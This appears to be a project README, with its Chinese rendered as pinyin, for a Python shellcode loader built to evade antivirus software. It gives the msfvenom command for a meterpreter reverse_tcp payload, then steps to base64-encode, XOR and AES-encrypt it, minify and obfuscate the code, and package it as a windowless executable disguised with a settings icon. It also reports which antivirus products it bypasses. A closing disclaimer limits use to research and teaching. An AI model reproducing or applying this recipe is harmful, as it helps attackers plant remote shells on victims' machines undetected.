python-shellcode-loader
Jian Dan Jie Shao
Mian Sha Fang Shi msfvenomSheng Cheng rawGe Shi De shellcode-->base64-->XOR-->AES
Jiang pythonDai Ma Suo Xiao Bing Hun Yao Zui Hou Sheng Cheng exe
Mu Qian Guo DF, 360He Huo Rong virustotal:7/66Guo Qia Ba Si Ji , Mai Ke Fei Deng
Huo Qu Xiang Mu
git clone https://github.com/HZzz2/python-shellcode-loader.git
cd python-shellcode-loader
pip install -r .\requirements.txt
Sheng Cheng shellcode
#Sheng Cheng shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
base64Bian Ma shellcodeBing Ti Huan jiami.pyZhong De Zhi
#base64base64 -w 0 -i rev.raw > rev.bs64cat rev.bs64
Fu Zhi base64De Zhi Ti Huan jiami.pyZhong payload Ye Jiu Shi Di Er Shi Si Xing sc='payload'
Jia Mi base64Bing Ti Huan main.pyZhong De Zhi
#Jia Mi base64Hou De shellcodepython3 jiami.py
#Hui Sheng Cheng Yi Ge aes-xor.txtDe Wen Jian ,Fu Zhi Wen Jian Li De Zhi (Jing Guo XORHe AESJia Mi Hou )
Fu Zhi De Zhi Ti Huan main.pyZhong De payload Ye Jiu Shi Di Si Shi Yi Xing jiami_sc='payload'
Suo Xiao He Hun Yao pyDai Ma
Suo Xiao pythonDai Ma
pyminify main.py --output main-mini.py
Hun Yao main-mini.pyZhong De pythonDai Ma
https://pyob.oxyry.com/ Zai Xian Hun Yao
Jiang Hun Yao Hou De Dai Ma Bao Cun Dao Yi Ge Wen Jian Zhong ,Bi Ru Wen Jian Ming Wei :main-mini-ob.py
Da Bao Cheng Ke Zhi Xing Wen Jian exe
#Da Bao Cheng exepyinstaller.exe -Fw -i .\setting.ico --key=leslie .\main-mini-ob.py
-F Da Bao Wei Dan Wen Jian -w Bu Xian Shi Chuang Kou -i icoTu Biao Wen Jian --key Jia Mi Zi Jie Ma De Mi Yao
Deng Dai Da Bao Wan Cheng . . . .
Da Bao Hao Hou De Ke Zhi Xing Cheng Xu Zai distMu Lu Zhong
Liu Cheng Tu
Jian Ce Tu
DF
Huo Hu
360Sha Du
360An Quan Wei Shi Yun Cha Sha
virustotal
run.mp4
Mian Ze Sheng Ming
Jin Gong An Quan Yan Jiu Yu Jiao Xue Zhi Yong ,Ru Guo Shi Yong Zhe Jiang Qi Zuo Qi Ta Yong Tu ,You Shi Yong Zhe Cheng Dan Quan Bu Fa Lu Ji Lian Dai Ze Ren ,Ben Ren Bu Cheng Dan Ren He Fa Lu Ji Lian Dai Ze Ren .